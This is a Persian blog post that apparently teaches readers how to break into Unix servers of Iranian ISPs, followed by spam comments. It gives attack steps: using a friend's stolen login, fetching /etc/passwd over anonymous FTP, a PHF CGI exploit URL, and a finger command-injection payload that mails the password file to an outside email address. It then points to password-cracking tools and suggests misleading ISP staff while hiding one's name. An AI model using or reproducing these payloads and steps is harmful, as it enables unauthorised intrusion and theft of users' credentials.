تبلیغات
..::بهترین در میهن بلاگ::.. - کارت رایگان


Admin Logo
themebox Logo
نویسنده :MSD=سعید
تاریخ:پنجشنبه 8 تیر 1385-12:06 ب.ظ

کارت رایگان

Unixیکی از سرورهایی است که در جهان بسیار از آن استفاده می شود در ایران  دربیشتر شهر های بزرگ هم ISPهایی وجود دارند که سرور آن ها Unixباشند .بنابر این شما می توانید برای هک آن ها از این راه ها استفاده کنید شما در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و IDها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شما یک فایل Passwdرا باز کنید چنین نوشته هایی را
می بینید .که باید آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad

در اینجا مثلا Tahaنام IDو 3a62...کلمه عبور اما به صورت رمز در آمده می باشد .
شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکن می سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا می خواهیم این فایل را دریافت کنیم .اولین قدم این است که آیدی در آن ISPبرای خود دست و پا کنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یک آشنای دور .پیدا کردن رمز دوست شما به سادگی میسر است که در حوصله این مقاله نمی گنجد .بعد از پیدا کردن رمز شما با آیدی دوستتان به شبکه Connectشوید .این اتصال می تواند یک اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال کامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد کنید
FTP http://www.domain.com/
که Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد کنید کلمه ی Anonymousرا بزنید .سپس وقتی درخواست کلمه عبور شد کلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان کنید و این بار در کادر Passwordآدرس Emailای را وارد کنید .اگر این بار هم جواب نداد به جای کلمه ی anonymousاز Userخود یعنی دوستتان استفاده کنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان کنید
FTP ftp.domain.com
اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال کنید که چگونه می توانم از سرور FTPخود شما استفاده کنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده کنم ولی مواظب باشید که نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بکنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ کنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا کنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان کنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کنید .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام دهید .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کنید .
www.domain.com/cgi-bin/finger
اگر این آدرس کار نکند دیگر هیچ امیدی نیست اما اگر کار کند کادری جلوی شما ظاهر می شود که می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد کنید .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد کردن این دستور فایل Passwdبرای من به آدرس 3dhack@yahoo.com پست می شود !
خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش شوید .
حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون کمکی به شما نمی کند و باید از روش های دیگری استفاده کرد .اما اگر یک فایل مثل نمونه اولی که در بالا بود گیر آوردید می توانید کار خود را ادامه دهید حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به کتابخانه هک به نام jill_v20 ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی .....



داغ کن - کلوب دات کام
نظرات() 

نوع مطلب : اینترنت مجانی =====> 

What is the Ilizarov method?
جمعه 24 شهریور 1396 08:32 ب.ظ
It is actually a great and helpful piece of information. I am happy that you simply shared this useful info with us.
Please stay us informed like this. Thank you for sharing.
http://jacqualinekulig.weebly.com/blog/what-is-mortons-neuroma
شنبه 14 مرداد 1396 11:04 ق.ظ
Excellent write-up. I absolutely love this website.
Stick with it!
 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر